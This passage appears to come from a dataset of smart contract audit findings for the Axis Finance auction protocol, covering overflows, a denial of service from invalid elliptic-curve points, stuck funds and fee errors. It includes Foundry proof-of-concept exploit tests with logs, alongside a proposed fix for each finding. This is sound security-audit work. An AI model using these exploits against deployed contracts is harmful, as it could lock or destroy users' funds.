abi.encode(""""),\\n derivativeType: toKeycode(""""),\\n derivativeParams: _derivativeParams,\\n wrapDerivative: false,\\n prefunded: true\\n });\\n\\n Auction.AuctionParams memory paramsA = Auction.AuctionParams({\\n start: 0,\\n duration: 1 days,\\n capacityInQuote: false,\\n capacity: lotCapacity,\\n implParams: abi.encode(myStruct)\\n });\\n\\n string memory infoHashA;\\n auctionHouse.auction(routingA, paramsA, infoHashA); \\n vm.stopPrank();\\n\\n vm.startPrank(owner);\\n FeeManager.FeeType type_ = FeeManager.FeeType.MaxCurator;\\n uint48 fee = 7_500; // 7.5% max curator fee\\n auctionHouse.setFee(keycode, type_, fee);\\n vm.stopPrank();\\n\\n vm.startPrank(curator);\\n uint96 fundingBeforeCuratorFee;\\n uint96 fundingAfterCuratorFee;\\n (,fundingBeforeCuratorFee,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(""Here is the funding normalized before curator fee is set: "", fundingBeforeCuratorFee/1e18);\\n auctionHouse.setCuratorFee(keycode, fee);\\n bytes memory callbackData_ = """";\\n auctionHouse.curate(0, callbackData_);\\n (,fundingAfterCuratorFee,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(""Here is the funding normalized after curator fee is set: "", fundingAfterCuratorFee/1e18);\\n console2.log(""Balance of base token of the auction house: "", mockBaseToken.balanceOf(address(auctionHouse))/1e18);\\n vm.stopPrank();\\n }\\n```\\n\\n```\\nLogs:\\n Here is the funding normalized before curator fee is set: 75000000000\\n Here is the funding normalized after curator fee is set: 1396837485\\n Balance of base token of the auction house: 80625000000\\n```\\n\\nTo run the test use: `forge test -vvv --mt test_CuratorFeeOverflow`","Either remove the unchecked block\\n```\\nunchecked {\\n routing.funding += curatorFeePayout;\\n}\\n```\\n\\nso that when overflow occurs, the transaction will revert, or better yet also change the funding variable type from `uint96` to `uint256` this way sellers can create big enough auctions, and provide sufficient curator fee in order to bootstrap their protocol successfully .","If there is an overflow occurs in the curate() function, a big portion of the tokens will be stuck in the `Axis-Finance` protocol forever, as there is no way for them to be withdrawn, either by an admin function, or by canceling the auction (if an auction has started, only FPAM auctions can be canceled), as the amount returned is calculated in the following way\\n```\\n if (routing.funding > 0) {\\n uint96 funding = routing.funding;\\n\\n // Set to 0 before transfer to avoid re-entrancy\\n routing.funding = 0;\\n\\n // Transfer the base tokens to the appropriate contract\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n funding,\\n false\\n );\\n // rest of code\\n }\\n```\\n",```\\n struct Routing {\\n // rest of code\\n uint96 funding; \\n // rest of code\\n }\\n```\\n +It is possible to DoS batch auctions by submitting invalid AltBn128 points when bidding,high,"Bidders can submit invalid points for the AltBn128 elliptic curve. The invalid points will make the decrypting process always revert, effectively DoSing the auction process, and locking funds forever in the protocol.\\nAxis finance supports a sealed-auction type of auctions, which is achieved in the Encrypted Marginal Price Auction module by leveraging the ECIES encryption scheme. Axis will specifically use a simplified ECIES implementation that uses the AltBn128 curve, which is a curve with generator point (1,2) and the following formula:\\n$$ y^2 = x^3 + 3 $$\\nBidders will submit encrypted bids to the protocol. One of the parameters required to be submitted by the bidders so that bids can later be decrypted is a public key that will be used in the EMPA decryption process:\\n```\\n// EMPAM.sol\\n\\nfunction _bid(\\n uint96 lotId_, \\n address bidder_,\\n address referrer_,\\n uint96 amount_,\\n bytes calldata auctionData_\\n ) internal override returns (uint64 bidId) {\\n // Decode auction data \\n (uint256 encryptedAmountOut, Point memory bidPubKey) = \\n abi.decode(auctionData_, (uint256, Point));\\n \\n // rest of code\\n\\n // Check that the bid public key is a valid point for the encryption library\\n if (!ECIES.isValid(bidPubKey)) revert Auction_InvalidKey(); \\n \\n // rest of code\\n\\n return bidId;\\n }\\n```\\n\\nAs shown in the code snippet, bidders will submit a `bidPubKey`, which consists in an x and y coordinate (this is actually the public key, which can be represented as a point with x and y coordinates over an elliptic curve).\\nThe `bidPubKey` point will then be validated by the ECIES library's `isValid()` function. Essentially, this function will perform three checks:\\nVerify that the point provided is on the AltBn128 curve\\nEnsure the x and y coordinates of the point provided don't correspond to the generator point (1, 2)\\nEnsure that the x and y coordinates of the point provided don't corrspond to the point at infinity (0,0)\\n```\\n// ECIES.sol\\n\\nfunction isOnBn128(Point memory p) public pure returns (bool) {\\n // check if the provided point is on the bn128 curve y**2 = x**3 + 3, which has generator point (1, 2)\\n return _fieldmul(p.y, p.y) == _fieldadd(_fieldmul(p.x, _fieldmul(p.x, p.x)), 3);\\n }\\n \\n /// @notice Checks whether a point is valid. We consider a point valid if it is on the curve and not the generator point or the point at infinity.\\n function isValid(Point memory p) public pure returns (bool) { \\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0); \\n }\\n```\\n\\nAlthough these checks are correct, one important check is missing in order to consider that the point is actually a valid point in the AltBn128 curve.\\nAs a summary, ECC incorporates the concept of finite fields. Essentially, the elliptic curve is considered as a square matrix of size pxp, where p is the finite field (in our case, the finite field defined in Axis' `ECIES.sol` library is stord in the `FIELD_MODULUS` constant with a value of 21888242871839275222246405745257275088696311157297823662689037894645226208583). The curve equation then takes this form:\\n$$ y2 = x^3 + ax + b (mod p) $$\\nNote that because the function is now limited to a field of pxp, any point provided that has an x or y coordinate greater than the modulus will fall outside of the matrix, thus being invalid. In other words, if x > p or y > p, the point should be considered invalid. However, as shown in the previous snippet of code, this check is not performed in Axis' ECIES implementation.\\nThis enables a malicious bidder to provide an invalid point with an x or y coordinate greater than the field, but that still passes the checked conditions in the ECIES library. The `isValid()` check will pass and the bid will be successfully submitted, although the public key is theoretically invalid.\\nThis leads us to the second part of the attack. When the auction concludes, the decryption process will begin. The process consists in:\\nCalling the `decryptAndSortBids()` function. This will trigger the internal `_decryptAndSortBids()` function. It is important to note that this function will only set the status of the auction to `Decrypted` if ALL the bids submitted have been decrypted. Otherwise, the auction can't continue.\\n`_decryptAndSortBids()` will call the internal `_decrypt()` function for each of the bids submittted\\n`_decrypt()` will finally call the ECIES' `decrypt()` function so that the bid can be decrypted:\\n// EMPAM.sol\\n\\nfunction _decrypt(\\n uint96 lotId_,\\n uint64 bidId_,\\n uint256 `privateKey_`\\n ) internal view returns (uint256 amountOut) {\\n // Load the encrypted bid data\\n EncryptedBid memory encryptedBid = encryptedBids[lotId_][bidId_];\\n\\n // Decrypt the message\\n // We expect a salt calculated as the keccak256 hash of lot id, bidder, and amount to provide some (not total) uniqueness to the encryption, even if the same shared secret is used\\n Bid storage bidData = bids[lotId_][bidId_];\\n uint256 message = ECIES.decrypt(\\n encryptedBid.encryptedAmountOut,\\n `encryptedBid.bidPubKey`, \\n `privateKey_`, \\n uint256(keccak256(abi.encodePacked(lotId_, bidData.bidder, bidData.amount))) // @audit-issue [MEDIUM] - Missing bidId in salt creates the edge case where a bid susceptible of being discovered if a user places two bids with the same input amount. Because the same key will be used when performing the XOR, the symmetric key can be extracted, thus potentially revealing the bid amounts.\\n ); \\n \\n \\n ...\\n } \\nAs shown in the code snippet, one of the parameters passed to the `ECIES.decrypt()` function will be the `encryptedBid.bidPubKey` (the invalid point provided by the malicious bidder). As we can see, the first step performed by `ECIES.decrypt()` will be to call the `recoverSharedSecret()` function, passing the invalid public key (ciphertextPubKey_) and the auction's global `privateKey_` as parameter:\\n// ECIES.sol\\n\\nfunction decrypt(\\n uint256 ciphertext_,\\n Point memory `ciphertextPubKey_`,\\n uint256 `privateKey_`,\\n uint256 salt_\\n ) public view returns (uint256 message_) {\\n // Calculate the shared secret\\n // Validates the ciphertext public key is on the curve and the private key is valid\\n uint256 sharedSecret = recoverSharedSecret(ciphertextPubKey_, privateKey_);\\n\\n ...\\n }\\n \\n function recoverSharedSecret(\\n Point memory `ciphertextPubKey_`,\\n uint256 `privateKey_`\\n ) public view returns (uint256) {\\n ...\\n \\n Point memory p = _ecMul(ciphertextPubKey_, privateKey_);\\n\\n return p.x;\\n }\\n \\n function _ecMul(Point memory p, uint256 scalar) private view returns (Point memory p2) {\\n (bool success, bytes memory output) =\\n address(0x07).staticcall{gas: 6000}(abi.encode(p.x, p.y, scalar));\\n\\n if (!success || output.length == 0) revert(""ecMul failed."");\\n\\n p2 = abi.decode(output, (Point));\\n }\\nAmong other things, `recoverSharedSecret()` will execute a scalar multiplication between the invalid public key and the global private key via the `ecMul` precompile. This is where the denial of servide will take place.\\nThe ecMul precompile contract was incorporated in EIP-196. Checking the EIP's exact semantics section, we can see that inputs will be considered invalid if “… any of the field elements (point coordinates) is equal or larger than the field modulus p, the contract fails”. Because the point submitted by the bidder had one of the x or y coordinates bigger than the field modulus p (because Axis never validated that such value was smaller than the field), the call to the ecmul precompile will fail, reverting with the “ecMul failed.” error.\\nBecause the decryption process expects ALL the bids submitted for an auction to be decrypted prior to actually setting the auctions state to `Decrypted`, if only one bid decryption fails, the decryption process won't be completed, and the whole auction process (decrypting, settling, …) won't be executable because the auction never reaches the `Decrypted` state.\\nProof of Concept\\nThe following proof of concept shows a reproduction of the attack mentioned above. In order to reproduce it, following these steps:\\nInside `EMPAModuleTest.sol`, change the `_createBidData()` function so that it uses the (21888242871839275222246405745257275088696311157297823662689037894645226208584, 2) point instead of the `_bidPublicKey` variable. This is a valid point as per Axis' checks, but it is actually invalid given that the x coordinate is greater than the field modulus:\\n`// EMPAModuleTest.t.sol\\n\\nfunction _createBidData(\\n address bidder_,\\n uint96 amountIn_,\\n uint96 amountOut_\\n ) internal view returns (bytes memory) {\\n uint256 encryptedAmountOut = _encryptBid(_lotId, bidder_, amountIn_, amountOut_);\\n \\n- return abi.encode(encryptedAmountOut, _bidPublicKey);\\n+ return abi.encode(encryptedAmountOut, Point({x: 21888242871839275222246405745257275088696311157297823662689037894645226208584, y: 2}));\\n } `\\nPaste the following code in moonraker/test/modules/auctions/EMPA/decryptAndSortBids.t.sol:\\n`// decryptAndSortBids.t.sol\\n\\nfunction testBugdosDecryption()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(_BID_AMOUNT, _BID_AMOUNT_OUT) \\n givenBidIsCreated(_BID_AMOUNT, _BID_AMOUNT_OUT) \\n givenLotHasConcluded \\n givenPrivateKeyIsSubmitted\\n {\\n\\n vm.expectRevert(""ecMul failed."");\\n _module.decryptAndSortBids(_lotId, 1);\\n\\n }`\\nRun the test inside `moonraker` with the following command: `forge test --mt testBugdosDecryption`","Ensure that the x and y coordinates are smaller than the field modulus inside the `ECIES.sol` `isValid()` function, adding the `p.x < FIELD_MODULUS && p.y < FIELD_MODULUS` check so that invalid points can't be submitted:\\n```\\n// ECIES.sol\\n\\nfunction isValid(Point memory p) public pure returns (bool) { \\n// Remove the line below\\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0); \\n// Add the line below\\n return isOnBn128(p) && !(p.x == 1 && p.y == 2) && !(p.x == 0 && p.y == 0) && (p.x < FIELD_MODULUS && p.y < FIELD_MODULUS); \\n }\\n```\\n","High. A malicious bidder can effectively DoS the decryption process, which will prevent all actions in the protocol from being executed. This attack will make all the bids and prefunded auction funds remain stuck forever in the contract, because all the functions related to the post-concluded auction steps expect the bids to be first decrypted.","```\\n// EMPAM.sol\\n\\nfunction _bid(\\n uint96 lotId_, \\n address bidder_,\\n address referrer_,\\n uint96 amount_,\\n bytes calldata auctionData_\\n ) internal override returns (uint64 bidId) {\\n // Decode auction data \\n (uint256 encryptedAmountOut, Point memory bidPubKey) = \\n abi.decode(auctionData_, (uint256, Point));\\n \\n // rest of code\\n\\n // Check that the bid public key is a valid point for the encryption library\\n if (!ECIES.isValid(bidPubKey)) revert Auction_InvalidKey(); \\n \\n // rest of code\\n\\n return bidId;\\n }\\n```\\n" +Downcasting to uint96 can cause assets to be lost for some tokens,high,"Downcasting to uint96 can cause assets to be lost for some tokens\\nAfter summing the individual bid amounts, the total bid amount is downcasted to uint96 without any checks\\n```\\n settlement_.totalIn = uint96(result.totalAmountIn);\\n```\\n\\nuint96 can be overflowed for multiple well traded tokens:\\nEg:\\nshiba inu : current price = $0.00003058 value of type(uint96).max tokens ~= 2^96 * 0.00003058 / 10^18 == 2.5 million $\\nHence auctions that receive more than type(uint96).max amount of tokens will be downcasted leading to extreme loss for the auctioner",Use a higher type or warn the user's of the limitations on the auction sizes,The auctioner will suffer extreme loss in situations where the auctions bring in >uint96 amount of tokens,```\\n settlement_.totalIn = uint96(result.totalAmountIn);\\n```\\n +Incorrect `prefundingRefund` calculation will disallow claiming,high,"Incorrect `prefundingRefund` calculation will lead to underflow and hence disallowing claiming\\nThe `prefundingRefund` variable calculation inside the `claimProceeds` function is incorrect\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code\\n\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // rest of code.\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n```\\n\\nHere `sold` is the total base quantity that has been `sold` to the bidders. Unlike required, the `routing.funding` variable need not be holding `capacity + (0,curator fees)` since it is decremented every time a payout of a bid is claimed\\n```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n if (bidClaim.payout > 0) {\\n \\n // rest of code\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= bidClaim.payout;\\n }\\n```\\n\\nExample\\nCapacity = 100 prefunded, hence routing.funding == 100 initially Sold = 90 and no partial fill/curation All bidders claim before the claimProceed function is invoked Hence routing.funding = 100 - 90 == 10 When claimProceeds is invoked, underflow and revert:\\nuint96 prefundingRefund = routing.funding + payoutSent_ - sold_ == 10 + 0 - 90",Change the calculation to:\\n```\\nuint96 prefundingRefund = capacity - sold_ + curatorFeesAdjustment (how much was prefunded initially - how much will be sent out based on capacity - sold)\\n```\\n,Claim proceeds function is broken. Sellers won't be able to receive the proceedings,"```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code\\n\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // rest of code.\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n```\\n" +If pfBidder gets blacklisted the settlement process would be broken and every other bidders and the seller would lose their funds,medium,"During batch auction settlement, the bidder whos bid was partially filled gets the refund amount in quote tokens and his payout in base immediately. In case if quote or base is a token with blacklisted functionality (e.g. USDC) and bidder's account gets blacklisted after the bid was submitted, the settlement would be bricked and all bidders and the seller would lose their tokens/proceeds.\\nIn the `AuctionHouse.settlement()` function there is a check if the bid was partially filled, in which case the function handles refund and payout immediately:\\n```\\n // Check if there was a partial fill and handle the payout + refund\\n if (settlement.pfBidder != address(0)) {\\n // Allocate quote and protocol fees for bid\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n // Reconstruct bid amount from the settlement price and the amount out\\n uint96(\\n Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n );\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= uint96(settlement.pfPayout);\\n }\\n\\n // Send refund and payout to the bidder\\n //@audit if pfBidder gets blacklisted the settlement is broken\\n Transfer.transfer(\\n routing.quoteToken, settlement.pfBidder, settlement.pfRefund, false\\n );\\n\\n _sendPayout(settlement.pfBidder, settlement.pfPayout, routing, auctionOutput);\\n }\\n```\\n\\nIf `pfBidder` gets blacklisted after he submitted his bid, the call to `settle()` would revert. There is no way for other bidders to get a refund for the auction since settlement can only happen after auction conclusion but the `refundBid()` function needs to be called before the conclusion:\\n```\\n function settle(uint96 lotId_)\\n external\\n virtual\\n override\\n onlyInternal\\n returns (Settlement memory settlement, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfLotActive(lotId_); //@audit\\n _revertIfLotSettled(lotId_);\\n \\n // rest of code\\n}\\n```\\n\\n```\\n function refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n ) external override onlyInternal returns (uint96 refund) {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfBidInvalid(lotId_, bidId_);\\n _revertIfNotBidOwner(lotId_, bidId_, caller_);\\n _revertIfBidClaimed(lotId_, bidId_);\\n _revertIfLotConcluded(lotId_); //@audit\\n\\n // Call implementation-specific logic\\n return _refundBid(lotId_, bidId_, caller_);\\n }\\n```\\n\\nAlso, the `claimBids` function would also revert since the lot wasn't settled and the seller wouldn't be able to get his prefunding back since he can neither `cancel()` the lot nor `claimProceeds()`.",Separate the payout and refunding logic for pfBidder from the settlement process.,Loss of funds,"```\\n // Check if there was a partial fill and handle the payout + refund\\n if (settlement.pfBidder != address(0)) {\\n // Allocate quote and protocol fees for bid\\n _allocateQuoteFees(\\n feeData.protocolFee,\\n feeData.referrerFee,\\n settlement.pfReferrer,\\n routing.seller,\\n routing.quoteToken,\\n // Reconstruct bid amount from the settlement price and the amount out\\n uint96(\\n Math.mulDivDown(\\n settlement.pfPayout, settlement.totalIn, settlement.totalOut\\n )\\n )\\n );\\n\\n // Reduce funding by the payout amount\\n unchecked {\\n routing.funding -= uint96(settlement.pfPayout);\\n }\\n\\n // Send refund and payout to the bidder\\n //@audit if pfBidder gets blacklisted the settlement is broken\\n Transfer.transfer(\\n routing.quoteToken, settlement.pfBidder, settlement.pfRefund, false\\n );\\n\\n _sendPayout(settlement.pfBidder, settlement.pfPayout, routing, auctionOutput);\\n }\\n```\\n" +"Unsold tokens from a FPAM auction, will be stuck in the protocol, after the auction concludes",medium,"The `Axis-Finance` protocol allows sellers to create two types of auctions: FPAM & EMPAM. An FPAM auction allows sellers to set a price, and a maxPayout, as well as create a prefunded auction. The seller of a FPAM auction can cancel it while it is still active by calling the cancel function which in turn calls the cancelAuction() function. If the auction is prefunded, and canceled while still active, all remaining funds will be transferred back to the seller. The problem arises if an FPAM prefunded auction is created, not all of the prefunded supply is bought by users, and the auction concludes. There is no way for the `baseTokens` still in the contract, to be withdrawn from the protocol, and they will be forever stuck in the `Axis-Finance` protocol. As can be seen from the below code snippet cancelAuction() function checks if an auction is concluded, and if it is the function reverts.\\n```\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n // Beyond the conclusion time\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n }\\n```\\n\\nGist After following the steps in the above mentioned gist add the following test to the `AuditorTests.t.sol` file\\n```\\nfunction test_FundedPriceAuctionStuckFunds() public {\\n vm.startPrank(alice);\\n Veecode veecode = fixedPriceAuctionModule.VEECODE();\\n Keycode keycode = keycodeFromVeecode(veecode);\\n bytes memory _derivativeParams = """";\\n uint96 lotCapacity = 75_000_000_000e18; // this is 75 billion tokens\\n mockBaseToken.mint(alice, lotCapacity);\\n mockBaseToken.approve(address(auctionHouse), type(uint256).max);\\n\\n FixedPriceAuctionModule.FixedPriceParams memory myStruct = FixedPriceAuctionModule.FixedPriceParams({\\n price: uint96(1e18), \\n maxPayoutPercent: uint24(1e5)\\n });\\n\\n Auctioneer.RoutingParams memory routingA = Auctioneer.RoutingParams({\\n auctionType: keycode,\\n baseToken: mockBaseToken,\\n quoteToken: mockQuoteToken,\\n curator: curator,\\n callbacks: ICallback(address(0)),\\n callbackData: abi.encode(""""),\\n derivativeType: toKeycode(""""),\\n derivativeParams: _derivativeParams,\\n wrapDerivative: false,\\n prefunded: true\\n });\\n\\n Auction.AuctionParams memory paramsA = Auction.AuctionParams({\\n start: 0,\\n duration: 1 days,\\n capacityInQuote: false,\\n capacity: lotCapacity,\\n implParams: abi.encode(myStruct)\\n });\\n\\n string memory infoHashA;\\n auctionHouse.auction(routingA, paramsA, infoHashA); \\n vm.stopPrank();\\n\\n vm.startPrank(bob);\\n uint96 fundingBeforePurchase;\\n uint96 fundingAfterPurchase;\\n (,fundingBeforePurchase,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(""Here is the funding normalized before purchase: "", fundingBeforePurchase/1e18);\\n mockQuoteToken.mint(bob, 10_000_000_000e18);\\n mockQuoteToken.approve(address(auctionHouse), type(uint256).max);\\n Router.PurchaseParams memory purchaseParams = Router.PurchaseParams({\\n recipient: bob,\\n referrer: address(0),\\n lotId: 0,\\n amount: 10_000_000_000e18,\\n minAmountOut: 10_000_000_000e18,\\n auctionData: abi.encode(0),\\n permit2Data: """"\\n });\\n bytes memory callbackData = """";\\n auctionHouse.purchase(purchaseParams, callbackData);\\n (,fundingAfterPurchase,,,,,,,) = auctionHouse.lotRouting(0);\\n console2.log(""Here is the funding normalized after purchase: "", fundingAfterPurchase/1e18);\\n console2.log(""Balance of seler of quote tokens: "", mockQuoteToken.balanceOf(alice)/1e18);\\n console2.log(""Balance of bob in base token: "", mockBaseToken.balanceOf(bob)/1e18);\\n console2.log(""Balance of auction house in base token: "", mockBaseToken.balanceOf(address(auctionHouse)) /1e18);\\n skip(86401);\\n vm.stopPrank();\\n\\n vm.startPrank(alice);\\n vm.expectRevert(\\n abi.encodeWithSelector(Auction.Auction_MarketNotActive.selector, 0)\\n );\\n auctionHouse.cancel(uint96(0), callbackData);\\n vm.stopPrank();\\n }\\n```\\n\\n```\\nLogs:\\n Here is the funding normalized before purchase: 75000000000\\n Here is the funding normalized after purchase: 65000000000\\n Balance of seler of quote tokens: 10000000000\\n Balance of bob in base token: 10000000000\\n Balance of auction house in base token: 65000000000\\n```\\n\\nTo run the test use: `forge test -vvv --mt test_FundedPriceAuctionStuckFunds`","Implement a function, that allows sellers to withdraw the amount left for a prefunded FPAM auction they have created, once the auction has concluded.","If a prefunded FPAM auction concludes and there are still tokens, not bought from the users, they will be stuck in the `Axis-Finance` protocol.","```\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n // Beyond the conclusion time\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n }\\n```\\n" +User's can be grieved by not submitting the private key,medium,"User's can be grieved by not submitting the private key\\nBids cannot be refunded once the auction concludes. And bids cannot be claimed until the auction has been settled. Similarly a EMPAM auction cannot be cancelled once started.\\n```\\n function claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n )\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_);\\n```\\n\\n```\\n function refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n ) external override onlyInternal returns (uint96 refund) {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfBeforeLotStart(lotId_);\\n _revertIfBidInvalid(lotId_, bidId_);\\n _revertIfNotBidOwner(lotId_, bidId_, caller_);\\n _revertIfBidClaimed(lotId_, bidId_);\\n _revertIfLotConcluded(lotId_);\\n```\\n\\n```\\n function _cancelAuction(uint96 lotId_) internal override {\\n // Validation\\n // Batch auctions cannot be cancelled once started, otherwise the seller could cancel the auction after bids have been submitted\\n _revertIfLotActive(lotId_);\\n```\\n\\n```\\n function cancelAuction(uint96 lotId_) external override onlyInternal {\\n // Validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotConcluded(lotId_);\\n```\\n\\n```\\n function _settle(uint96 lotId_)\\n internal\\n override\\n returns (Settlement memory settlement_, bytes memory auctionOutput_)\\n {\\n // Settle the auction\\n // Check that auction is in the right state for settlement\\n if (auctionData[lotId_].status != Auction.Status.Decrypted) {\\n revert Auction_WrongState(lotId_);\\n }\\n```\\n\\nFor EMPAM auctions, the private key associated with the auction has to be submitted before the auction can be settled. In auctions where the private key is held by the seller, they can grief the bidder's or in cases where a key management solution is used, both seller and bidder's can be griefed by not submitting the private key.",Acknowledge the risk involved for the seller and bidder,User's will not be able to claim their assets in case the private key holder doesn't submit the key for decryption,"```\\n function claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n )\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n {\\n // Standard validation\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_);\\n```\\n" +Bidder's payout claim could fail due to validation checks in LinearVesting,medium,"Bidder's payout claim will fail due to validation checks in LinearVesting after the expiry timestamp\\nBidder's payout are sent by internally calling the `_sendPayout` function. In case the payout is a derivative which has already expired, this will revert due to the validation check of `block.timestmap < expiry` present in the mint function of LinearVesting derivative\\n```\\n function _sendPayout(\\n address recipient_,\\n uint256 payoutAmount_,\\n Routing memory routingParams_,\\n bytes memory\\n ) internal {\\n \\n if (fromVeecode(derivativeReference) == bytes7("""")) {\\n Transfer.transfer(baseToken, recipient_, payoutAmount_, true);\\n }\\n else {\\n \\n DerivativeModule module = DerivativeModule(_getModuleIfInstalled(derivativeReference));\\n\\n Transfer.approve(baseToken, address(module), payoutAmount_);\\n\\n=> module.mint(\\n recipient_,\\n address(baseToken),\\n routingParams_.derivativeParams,\\n payoutAmount_,\\n routingParams_.wrapDerivative\\n );\\n```\\n\\n```\\n function mint(\\n address to_,\\n address underlyingToken_,\\n bytes memory params_,\\n uint256 amount_,\\n bool wrapped_\\n )\\n external\\n virtual\\n override\\n returns (uint256 tokenId_, address wrappedAddress_, uint256 amountCreated_)\\n {\\n if (amount_ == 0) revert InvalidParams();\\n\\n VestingParams memory params = _decodeVestingParams(params_);\\n\\n if (_validate(underlyingToken_, params) == false) {\\n revert InvalidParams();\\n }\\n```\\n\\n```\\n function _validate(\\n address underlyingToken_,\\n VestingParams memory data_\\n ) internal view returns (bool) {\\n \\n // rest of code.\\n\\n=> if (data_.expiry < block.timestamp) return false;\\n\\n\\n // Check that the underlying token is not 0\\n if (underlyingToken_ == address(0)) return false;\\n\\n\\n return true;\\n }\\n```\\n\\nHence the user's won't be able to claim their payouts of an auction once the derivative has expired. For EMPAM auctions, a seller can also wait till this timestmap passes before revealing their private key which will disallow bidders from claiming their rewards.","Allow to mint tokens even after expiry of the vesting token / deploy the derivative token first itself and when making the payout, transfer the base token directly incase the expiry time is passed",Bidder's won't be able claim payouts from auction after the derivative expiry timestamp,"```\\n function _sendPayout(\\n address recipient_,\\n uint256 payoutAmount_,\\n Routing memory routingParams_,\\n bytes memory\\n ) internal {\\n \\n if (fromVeecode(derivativeReference) == bytes7("""")) {\\n Transfer.transfer(baseToken, recipient_, payoutAmount_, true);\\n }\\n else {\\n \\n DerivativeModule module = DerivativeModule(_getModuleIfInstalled(derivativeReference));\\n\\n Transfer.approve(baseToken, address(module), payoutAmount_);\\n\\n=> module.mint(\\n recipient_,\\n address(baseToken),\\n routingParams_.derivativeParams,\\n payoutAmount_,\\n routingParams_.wrapDerivative\\n );\\n```\\n" +Inaccurate value is used for partial fill quote amount when calculating fees,medium,"Inaccurate value is used for partial fill quote amount when calculating fees which can cause reward claiming / payment withdrawal to revert\\nThe fees of an auction is managed as follows:\\nWhenever a bidder claims their payout, calculate the amount of quote tokens that should be collected as fees (instead of giving the entire quote amount to the seller) and add this to the protocol / referrers rewards\\n```\\n function claimBids(uint96 lotId_, uint64[] calldata bidIds_) external override nonReentrant {\\n \\n // rest of code.\\n\\n for (uint256 i = 0; i < bidClaimsLen; i++) {\\n Auction.BidClaim memory bidClaim = bidClaims[i];\\n\\n if (bidClaim.payout > 0) {\\n \\n=> _allocateQuoteFees(\\n protocolFee,\\n referrerFee,\\n bidClaim.referrer,\\n routing.seller,\\n routing.quoteToken,\\n=> bidClaim.paid\\n );\\n```\\n\\nHere bidClaim.paid is the amount of quote tokens that was transferred in by the bidder for the purchase\\n```\\n function _allocateQuoteFees(\\n uint96 protocolFee_,\\n uint96 referrerFee_,\\n address referrer_,\\n address seller_,\\n ERC20 quoteToken_,\\n uint96 amount_\\n ) internal returns (uint96 totalFees) {\\n // Calculate fees for purchase\\n (uint96 toReferrer, uint96 toProtocol) = calculateQuoteFees(\\n protocolFee_, referrerFee_, referrer_ != address(0) && referrer_ != seller_, amount_\\n );\\n\\n // Update fee balances if non-zero\\n if (toReferrer > 0) rewards[referrer_][quoteToken_] += uint256(toReferrer);\\n if (toProtocol > 0) rewards[_protocol][quoteToken_] += uint256(toProtocol);\\n\\n\\n return toReferrer + toProtocol;\\n }\\n```\\n\\nWhenever the seller calls claimProceeds to withdraw the amount of quote tokens received from the auction, subtract the quote fees and give out the remaining\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n \\n // rest of code.\\n \\n uint96 totalInLessFees;\\n {\\n=> (, uint96 toProtocol) = calculateQuoteFees(\\n lotFees[lotId_].protocolFee, lotFees[lotId_].referrerFee, false, purchased_\\n );\\n 